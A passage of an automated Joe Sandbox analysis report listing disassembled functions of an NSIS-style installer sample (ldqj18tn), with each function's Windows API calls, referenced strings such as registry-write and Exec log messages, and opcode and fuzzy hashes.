                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32 ref: 004028DA
                                                          • lstrlenW.KERNEL32(004130D8,00000023), ref: 004028FD
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?), ref: 004029BC
                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                          Strings
                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                          • API String ID: 1641139501-220328614
                                                          • Opcode ID: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                          • Instruction ID: 4333191c585e2ccbf31537ec3fe99400e108362b2ae8da956978e4ec321c2a22
                                                          • Opcode Fuzzy Hash: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                          • Instruction Fuzzy Hash: 59319AB2E00208BFDF22AF91CE4699EBF76EB04714F10407BF505701A1D6794B60AB99
                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3734993849-2769509956
                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                          • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040419E
                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                          • SendMessageW.USER32(00000000,00000443,?,?), ref: 004041BD
                                                          • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004041CB
                                                          • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004041D6
                                                          • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004041E3
                                                          • SendMessageW.USER32(00000000,00000449,?,?), ref: 004041F2
                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00403FE1
                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00403FF0
                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00404004
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ByteCharMultiWide$AllocButtonCheckColorGlobalItemlstrlen
                                                          • String ID:
                                                          • API String ID: 3308522672-0
                                                          • Opcode ID: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                          • Instruction ID: f43bbde6d36b0f8d2302eacd2e434541dff8fa1ace2a4d459b82edc74fb6029a
                                                          • Opcode Fuzzy Hash: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                          • Instruction Fuzzy Hash: B431B2B1900109BFDB009F64DD85E6E3BA9FB44709F00803AFA05FB2E1D7789A51DB59
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                          Strings
                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                          • API String ID: 1033533793-945480824
                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                          Strings
                                                          • Exec: success ("%s"), xrefs: 00402263
                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                          • Exec: command="%s", xrefs: 00402241
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                          • API String ID: 2014279497-3433828417
                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                          • GetMessagePos.USER32 ref: 00404871
                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                          • MulDiv.KERNEL32(0000E000,00000064,?), ref: 00403295
                                                          • wsprintfW.USER32 ref: 004032A5
                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                          APIs
                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                          • wsprintfW.USER32 ref: 00404457
                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$@rD
                                                          • API String ID: 3540041739-1813061909
                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
